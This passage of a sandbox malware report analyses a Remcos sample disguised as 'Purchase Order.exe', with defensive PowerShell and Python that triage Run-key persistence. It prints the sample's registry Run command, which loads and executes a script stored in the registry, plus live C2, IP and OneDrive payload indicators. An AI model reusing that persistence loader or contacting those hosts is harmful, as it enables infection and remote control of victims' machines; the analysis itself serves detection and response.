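        $envDefs = foreach ($m in [regex]::Matches($raw, '%([^%]+)%')) {
            $v = $m.Groups[1].Value
            '{0}={1}' -f $v, (Get-ItemProperty -Path 'HKCU:\Environment' -Name $v -ErrorAction SilentlyContinue).$v
        }

        [pscustomobject]@{
            ValueName       = $name
            ValueKind       = $kind
            Command         = $raw
            Indicators      = ($tokens -join ', ')
            EnvDefinitions  = ($envDefs -join '; ')
            PayloadKey      = $payloadKey
            PayloadProperty = $payloadProperty
        }
    }
}

function Export-StagedPayload {
    # Copies the staged script to disk for offline review; it is never executed.
    param(
        [Parameter(Mandatory)][string]$Key,
        [Parameter(Mandatory)][string]$Property,
        [string]$OutDir = $env:TEMP
    )
    if (-not (Test-Path -Path $Key)) { return $null }
    $payload = (Get-ItemProperty -Path $Key -Name $Property -ErrorAction SilentlyContinue).$Property
    if (-not $payload) { return $null }
    $out = Join-Path $OutDir ('staged_{0}.ps1.txt' -f $Property)
    Set-Content -Path $out -Value $payload -Encoding UTF8
    return $out
}

# Usage: list matching Run values, then preserve any staged script they reference.
Get-SuspiciousRunEntry | ForEach-Object {
    $_ | Format-List
    if ($_.PayloadKey) {
        $file = Export-StagedPayload -Key $_.PayloadKey -Property $_.PayloadProperty
        if ($file) { "Staged payload saved for analysis: $file" }
    }
}
```

Run it in the context of the affected user (the key and the environment variable are both per-user), and treat a hit as a reason to collect the referenced key, the Run value and the Ultradolichocephaly.exe drop together before remediating, since deleting the Run value alone leaves the staged script in the registry.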

Stealing of Sensitive Information

Source: Yara match | File source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques to which signatures in this analysis were mapped; the number in parentheses is the count of mapped signatures.

Execution
    Windows Management Instrumentation (1)
    Command and Scripting Interpreter (11)
    PowerShell (2)
Persistence
    DLL Side-Loading (1)
    Registry Run Keys / Startup Folder (1)
Privilege Escalation
    DLL Side-Loading (1)
    Access Token Manipulation (1)
    Process Injection (112)
    Registry Run Keys / Startup Folder (1)
Defense Evasion
    Deobfuscate/Decode Files or Information (1)
    Software Packing (1)
    DLL Side-Loading (1)
    Masquerading (11)
    Modify Registry (1)
    Virtualization/Sandbox Evasion (31)
    Access Token Manipulation (1)
    Process Injection (112)
Discovery
    File and Directory Discovery (3)
    System Information Discovery (14)
    Security Software Discovery (111)
    Process Discovery (2)
    Virtualization/Sandbox Evasion (31)
    Application Window Discovery (1)
Collection
    Archive Collected Data (1)
    Clipboard Data (1)
Command and Control
    Ingress Tool Transfer (1)
    Encrypted Channel (11)
    Non-Standard Port (1)
    Non-Application Layer Protocol (2)
    Application Layer Protocol (213)
Impact
    System Shutdown/Reboot (1)

No signatures were mapped under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement or Exfiltration. The remaining cells of the rendered matrix (Valid Accounts, OS Credential Dumping, Remote Services, Logon Script (Windows), Keylogging and so on) are the unpopulated technique placeholders that the matrix displays for every report, not observations about this sample.
Behavior Graph ID: 1440304 | Sample: Purchase Order.exe | Start date: 13/05/2024 | Architecture: WINDOWS | Score: 100

Process tree reconstructed from the behavior graph (the graph image and its icon legend are not reproduced here):

Purchase Order.exe
    dropped:    C:\Users\user\AppData\Local\...pilogic.bac (ASCII)
    signature:  Suspicious powershell command line found
    +-- powershell.exe
        dropped:    C:\Users\user\...\Ultradolichocephaly.exe (PE32)
        signatures: Obfuscated command line found; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
        +-- conhost.exe
        +-- cmd.exe
        +-- Ultradolichocephaly.exe
            network:    tochisglobal.ddns.net, 103.253.17.222, port 6426 (client port 49715), WIFIKU-AS-ID PT Wifiku Indonesia (ID), country unknown
                        dual-spov-0006.spov-msedge.net, 13.107.137.11, port 443 (client port 49713), MICROSOFT-CORP-MSN-AS-BLOCK (US), United States
                        geoplugin.net, 178.237.33.50, port 80 (client port 49716), ATOM86-AS ATOM86 (NL), Netherlands
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
            +-- cmd.exe
                +-- conhost.exe
                +-- reg.exe

Graph-level DNS/IP nodes: tochisglobal.ddns.net, web.fe.1drv.com and 6 other IPs or domains. Graph-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 7 other signatures; Uses dynamic DNS services (attached to tochisglobal.ddns.net).

Antivirus detection: submitted sample

Source                Detection   Scanner         Label
Purchase Order.exe    8%          ReversingLabs
Purchase Order.exe    21%         Virustotal
Purchase Order.exe    100%        Avira           HEUR/AGEN.1331786

Antivirus detection: dropped files

Source                                                       Detection   Scanner         Label
C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe     100%        Avira           HEUR/AGEN.1331786
C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe     8%          ReversingLabs
C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe     21%         Virustotal

No Antivirus matches

Antivirus detection: domains

Source                            Detection   Scanner
dual-spov-0006.spov-msedge.net    0%          Virustotal
tochisglobal.ddns.net             10%         Virustotal
geoplugin.net                     3%          Virustotal

Antivirus detection: URLs

Source                                    Detection   Scanner            Label
http://pesterbdd.com/images/Pester.png    100%        URL Reputation     malware
https://contoso.com/License               0%          URL Reputation     safe
https://contoso.com/Icon                  0%          URL Reputation     safe (reported twice)
http://geoplugin.net/json.gp              100%        URL Reputation     phishing (reported twice)
http://crl.micro                          0%          URL Reputation     safe (reported twice)
https://contoso.com/                      0%          URL Reputation     safe
http://geoplugin.net/json.gpo             0%          Avira URL Cloud    safe
http://geoplugin.net/json.gpl             0%          Avira URL Cloud    safe
http://geoplugin.net/                     0%          Avira URL Cloud    safe
http://geoplugin.net/json.gpN             0%          Avira URL Cloud    safe
tochisglobal.ddns.net                     100%        Avira URL Cloud    malware
http://geoplugin.net/t:                   0%          Avira URL Cloud    safe
http://geoplugin.net/json.gpW             0%          Avira URL Cloud    safe
http://geoplugin.net/json.gpl             0%          Virustotal
http://geoplugin.net/w                    0%          Avira URL Cloud    safe
http://geoplugin.net/json.gpN             0%          Virustotal
http://geoplugin.net/json.gpo             0%          Virustotal
http://geoplugin.net/                     3%          Virustotal
tochisglobal.ddns.net                     10%         Virustotal
http://geoplugin.net/json.gpW             0%          Virustotal
http://geoplugin.net/w                    0%          Virustotal

Reading this table: the pesterbdd.com and contoso.com entries, like the other powershell.exe-sourced URLs below, are strings from PowerShell module manifests loaded into powershell.exe (Pester's icon, licence and project URIs and the contoso.com placeholder URIs), not infrastructure the sample contacted; the "malware" verdict on Pester.png is a reputation-feed false positive. The geoplugin.net/json.gpo, .gpl, .gpN, .gpW, /t: and /w variants are memory-string fragments with trailing bytes of the one request that was actually made, http://geoplugin.net/json.gp, which Remcos uses to geolocate the victim. The indicators worth acting on from this table are tochisglobal.ddns.net (the C2 host, see the contacted-URL table below) and the geoplugin.net lookup as a supporting signal.
Contacted domains

Name                              IP                Active    Malicious   Antivirus Detection   Reputation
dual-spov-0006.spov-msedge.net    13.107.137.11     true      false                             unknown
tochisglobal.ddns.net             103.253.17.222    true      true                              unknown
geoplugin.net                     178.237.33.50     true      false                             unknown
onedrive.live.com                 unknown           unknown   false                             high
kxwbha.am.files.1drv.com          unknown           unknown   false                             high

Contacted URLs

Name                                                                                         Malicious   Antivirus Detection                              Reputation
https://onedrive.live.com/download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI     false                                                        high
http://geoplugin.net/json.gp                                                                 true        URL Reputation: phishing (reported twice)        unknown
tochisglobal.ddns.net                                                                        true        Virustotal 10%; Avira URL Cloud: malware         unknown
URLs from memory and binary data (Name / Source / Malicious / Antivirus Detection / Reputation)

Name: https://onedrive.live.com/download?resid=7EB674A88CCF381D%21539&authkey=
    Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000002.3214197333.00000000234E0000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmp
    Malicious: true | Antivirus detection: URL Reputation: malware | Reputation: unknown

Name: http://geoplugin.net/json.gpl
    Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: Virustotal 0%; Avira URL Cloud: safe | Reputation: unknown

Name: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: http://geoplugin.net/json.gpo
    Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: Virustotal 0%; Avira URL Cloud: safe | Reputation: unknown

Name: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

Name: https://kxwbha.am.files.1drv.com/
    Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: URL Reputation: safe (reported twice) | Reputation: unknown

Name: http://nsis.sf.net/NSIS_ErrorError
    Source: Purchase Order.exe, 00000000.00000000.1953867569.0000000000409000.00000008.00000001.01000000.00000003.sdmp; Purchase Order.exe, 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp; Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: https://kxwbha.am.files.1drv.com/y4mpeceYAMLWx5PShbJGMk6tKW6mQBechZgu3aTbJoU6yxz1XJ53X1sSgh53U1m7pv4
    Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: https://aka.ms/pscore6lBsq
    Source: powershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: https://onedrive.live.com/
    Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.0000000007828000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: https://onedrive.live.com/4w7
    Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078A1000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: https://kxwbha.am.files.1drv.com/4
    Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: http://nsis.sf.net/NSIS_Error
    Source: Ultradolichocephaly.exe; Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: http://crl.micro
    Source: powershell.exe, 00000002.00000002.2749734497.00000000071DB000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: URL Reputation: safe (reported twice) | Reputation: unknown

Name: http://geoplugin.net/
    Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: Virustotal 3%; Avira URL Cloud: safe | Reputation: unknown

Name: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

Name: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: http://geoplugin.net/json.gpN
    Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: Virustotal 0%; Avira URL Cloud: safe | Reputation: unknown

Name: https://kxwbha.am.files.1drv.com/D
    Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Antivirus detection: none | Reputation: high

Name: http://geoplugin.net/t:
    Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp; Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://geoplugin.net/json.gpWUltradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://geoplugin.net/wUltradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://kxwbha.am.files.1drv.com/pFUltradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2738950429.00000000078B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.137.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
103.253.17.222 | tochisglobal.ddns.net | unknown | 59139 | WIFIKU-AS-IDPTWifikuIndonesiaID | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1440304
Start date and time: 2024-05-13 06:02:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase Order.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@13/12@4/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 94
• Number of non-executed functions: 75
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-am-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Ultradolichocephaly.exe, PID 6008 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 1492 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:02:49 | API Interceptor | 40x Sleep call for process: powershell.exe modified
06:04:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Announces %Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)
06:04:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Announces %Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)
06:04:41 | API Interceptor | 4x Sleep call for process: Ultradolichocephaly.exe modified
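The two Autostart rows above are the persistence mechanism in one line: a Run value ("Announces") whose data launches the PowerShell interpreter through an attacker-defined environment variable (%Compressible%), starts it minimized, reads the real script body out of a second registry location (key HKCU:\Xylograferede94\, value Karatenes) into a variable, and then executes that variable. The Python below is an added example, not part of the Joe Sandbox report, that scores exported Run-key entries (for instance from `reg query` output or a sandbox dump) for exactly those traits, so a responder can triage them offline and recover the second-stage registry location to collect next. The RunEntry/Finding classes, the indicator weights and threshold, the set of "standard" environment variable names, and the sample entries other than the report's own "Announces" value are assumptions made for this example.

```python
"""Triage Windows Run-key entries exported from a host or a sandbox report.

Added example: scores each autostart command for the traits the report's
"Announces" value shows (interpreter behind a custom environment variable,
minimized window, script body fetched from another registry value and then
executed) and extracts that second-stage registry location for collection.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Environment variables that legitimately begin a Run command. A command that
# starts with any other %NAME% is using an attacker-defined alias for its
# interpreter. Assumption for the example: extend this set for your estate.
STANDARD_ENV = {
    "systemroot", "windir", "programfiles", "programfiles(x86)", "programdata",
    "localappdata", "appdata", "userprofile", "systemdrive", "public", "temp", "tmp",
}

LEADING_ENV = re.compile(r'^\s*"?%([^%]+)%')
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|minimized)\b", re.I)
ENCODED_CMD = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# "$var=(Get-ItemProperty -Path 'HKCU:\Key\').Value" -> registry key and value name
REG_READ = re.compile(
    r"Get-ItemProperty\s+-Path\s+'?(HK(?:CU|LM|CR|U|CC):\\[^'\s)]+)'?\s*\)\s*\.(\w+)", re.I)
ASSIGN_FROM_REG = re.compile(r"\$(\w+)\s*=\s*\(\s*Get-ItemProperty", re.I)
# "%alias% ($var)", "& ($var)", "iex $var": executing a string held in a variable
VAR_EXEC = re.compile(
    r"(?:%[^%]+%|&|\biex\b|\bInvoke-Expression\b)\s*\(?\s*\$(\w+)\s*\)?", re.I)


@dataclass
class RunEntry:
    key: str       # e.g. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    name: str      # value name, e.g. "Announces"
    command: str   # value data


@dataclass
class Finding:
    entry: RunEntry
    indicators: List[str] = field(default_factory=list)
    score: int = 0
    payload_key: Optional[str] = None    # registry key holding the real script
    payload_value: Optional[str] = None  # value name under that key


def analyse(entry: RunEntry) -> Finding:
    """Score one Run-key command. Weights are assumptions chosen for the example."""
    f = Finding(entry)
    cmd = entry.command

    env = LEADING_ENV.match(cmd)
    if env and env.group(1).lower() not in STANDARD_ENV:
        f.indicators.append(f"interpreter hidden behind custom variable %{env.group(1)}%")
        f.score += 2
    if HIDDEN_WINDOW.search(cmd):
        f.indicators.append("window hidden or minimized")
        f.score += 2
    if ENCODED_CMD.search(cmd):
        f.indicators.append("base64-encoded command")
        f.score += 3

    reg = REG_READ.search(cmd)
    if reg:
        f.payload_key, f.payload_value = reg.group(1), reg.group(2)
        f.indicators.append(f"reads script from {f.payload_key} value {f.payload_value}")
        f.score += 3
        assigned = ASSIGN_FROM_REG.search(cmd)
        executed = VAR_EXEC.search(cmd)
        if assigned and executed and assigned.group(1).lower() == executed.group(1).lower():
            f.indicators.append(f"executes the registry-stored string via ${assigned.group(1)}")
            f.score += 2
    return f


def triage(entries: List[RunEntry], threshold: int = 4) -> List[Finding]:
    """Return the entries worth a human look, most suspicious first."""
    hits = [f for f in map(analyse, entries) if f.score >= threshold]
    return sorted(hits, key=lambda f: f.score, reverse=True)


# Constructed sample input. The first entry is the Run value from the report
# above; the other two are made up for contrast (one benign, one encoded).
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_ENTRIES = [
    RunEntry(RUN_KEY, "Announces",
             r"%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty "
             r"-Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"),
    RunEntry(RUN_KEY, "OneDrive",
             r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    RunEntry(RUN_KEY, "Updater",
             "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_ENTRIES):
        print(f"[{hit.score}] {hit.entry.key}\\{hit.entry.name}")
        for ind in hit.indicators:
            print("   -", ind)
        if hit.payload_key:
            print(f"   collect next: {hit.payload_key} -> {hit.payload_value}")
```

The point of the payload_key/payload_value fields is the pivot: the Run value itself is only a loader, so after flagging it the responder should export HKCU:\Xylograferede94\ (and its Karatenes value) before the host is cleaned, since that is where the script actually lives. The environment-variable check only fires on a leading %NAME% outside the standard set, so ordinary Run entries such as "%ProgramFiles%\..." do not score.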
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.137.11 | Payment Remittance Advice_000000202213.xlsb | malicious | Unknown | onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
103.253.17.222 | JPEG00774533.vbs | malicious | Remcos, GuLoader
103.253.17.222 | CamScanner0091.vbs | malicious | Remcos, GuLoader
103.253.17.222 | PI00232.vbs | malicious | Remcos, GuLoader
178.237.33.50 | x1TYUNtEO1zz.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
178.237.33.50 | xq5lqKlBeIAJ.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
178.237.33.50 | 1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
178.237.33.50 | Palmebladstag.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | 2024090533201.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | JaXXnpJZ3z.exe | malicious | Remcos, DBatLoader, PrivateLoader | geoplugin.net/json.gp
178.237.33.50 | payment_0045k.xls | malicious | Remcos, DBatLoader, PrivateLoader | geoplugin.net/json.gp
178.237.33.50 | License authorization Custom invoice INFO - Factura Aduana INFO (2).xls | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
178.237.33.50 | #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
178.237.33.50 | IW7w68n6vf.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
dual-spov-0006.spov-msedge.net | Purchase Order is approved20240509.cmd | malicious | DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | JaXXnpJZ3z.exe | malicious | Remcos, DBatLoader, PrivateLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | payment_0045k.xls | malicious | Remcos, DBatLoader, PrivateLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5h | malicious | Unknown | 13.107.139.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5h | malicious | Unknown | 13.107.139.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5h | malicious | Unknown | 13.107.137.11
dual-spov-0006.spov-msedge.net | 5bsgSbGQhc.rtf | malicious | Remcos, DBatLoader, PrivateLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | thelevel.doc | malicious | Remcos, DBatLoader, PrivateLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | BankSwift.xls | malicious | Remcos, DBatLoader, PrivateLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | htm.exe | malicious | Remcos, DBatLoader, PrivateLoader | 13.107.139.11
tochisglobal.ddns.net | JPEG00774533.vbs | malicious | Remcos, GuLoader | 103.253.17.222
tochisglobal.ddns.net | CamScanner0091.vbs | malicious | Remcos, GuLoader | 103.253.17.222
tochisglobal.ddns.net | PI00232.vbs | malicious | Remcos, GuLoader | 103.253.17.222
geoplugin.net | x1TYUNtEO1zz.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
geoplugin.net | xq5lqKlBeIAJ.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
geoplugin.net | 1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
geoplugin.net | Palmebladstag.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | 2024090533201.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | JaXXnpJZ3z.exe | malicious | Remcos, DBatLoader, PrivateLoader | 178.237.33.50
geoplugin.net | payment_0045k.xls | malicious | Remcos, DBatLoader, PrivateLoader | 178.237.33.50
geoplugin.net | License authorization Custom invoice INFO - Factura Aduana INFO (2).xls | malicious | Remcos, PrivateLoader | 178.237.33.50
geoplugin.net | #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
geoplugin.net | IW7w68n6vf.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS | Soa as at (Apr - 24).exe | malicious | Unknown | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | Refunded.exe | malicious | PureLog Stealer, RedLine, zgRAT | 13.107.213.70
MICROSOFT-CORP-MSN-AS-BLOCKUS | qMh36Rvh4J.elf | malicious | Mirai | 21.189.222.8
MICROSOFT-CORP-MSN-AS-BLOCKUS | h5jtx8DXVf.elf | malicious | Unknown | 104.214.47.115
MICROSOFT-CORP-MSN-AS-BLOCKUS | z5tLjmo4GP.elf | malicious | Mirai | 191.237.255.164
MICROSOFT-CORP-MSN-AS-BLOCKUS | HepvgtsxX7.elf | malicious | Mirai | 21.17.99.121
MICROSOFT-CORP-MSN-AS-BLOCKUS | Gj3ajUucBo.elf | malicious | Mirai | 52.245.21.242
MICROSOFT-CORP-MSN-AS-BLOCKUS | EE9yU8bN9i.elf | malicious | Unknown | 20.195.77.115
MICROSOFT-CORP-MSN-AS-BLOCKUS | X7xw44e4Ob.elf | malicious | Mirai | 22.10.43.230
MICROSOFT-CORP-MSN-AS-BLOCKUS | 4DSN0Zi9Og.elf | malicious | Unknown | 20.163.151.43
